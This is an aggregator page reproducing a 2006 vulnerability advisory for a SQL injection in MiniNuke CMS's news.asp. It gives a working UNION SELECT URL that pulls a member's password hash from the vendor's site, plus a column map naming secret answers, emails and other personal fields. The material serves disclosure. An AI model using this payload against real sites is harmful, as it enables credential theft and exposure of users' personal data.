Lucene search

K

MiniNukeSQL.txt

🗓️ 15 Jan 2006 00:00:00Reported by Mustafa Can BjornType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

MiniNuke CMS version 1.8.2 SQL Injection vulnerability in news.asp allows remote SQL query injections.

Show more
Code
`--Security Report--  
Advisory: MiniNuke CMS System <= 1.8.2 (news.asp) SQL Injection vulnerability  
---  
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI  
---  
Date: 12/01/06 08:47 PM  
---  
Contacts:{  
ICQ: 10072  
MSN/Email: [email protected]  
Web: http://www.nukedx.com  
}  
---  
Vendor: MiniNuke (www.miniex.net)  
Version: 1.8.2 and prior versions must be affected.  
About:Via this method remote attacker can inject SQL query to the news.asp  
---  
How&Example: GET -> http://[site]/news.asp?Action=Print&hid=[SQLQuery]  
http://www.miniex.net/news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=52  
Columns of MEMBERS:  
uye_id = userid  
sifre = md5 password hash  
g_soru = secret question.  
g_cevap = secret answer  
email = mail address  
isim = name  
icq = ICQ Uin  
msn = MSN Sn.  
aim = AIM Sn.  
meslek = job  
cinsiyet = gender  
yas = age  
url = url  
imza = signature  
mail_goster = show mail :P  
avurl = avatar url  
avatar = avatar  
--  
Thanks to ajan;)  
Regards,  
>From the NWPX team,  
nuker a.k.a nukedx  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
15 Jan 2006 00:00Current
7.4High risk
Vulners AI Score7.4
22
.json
Report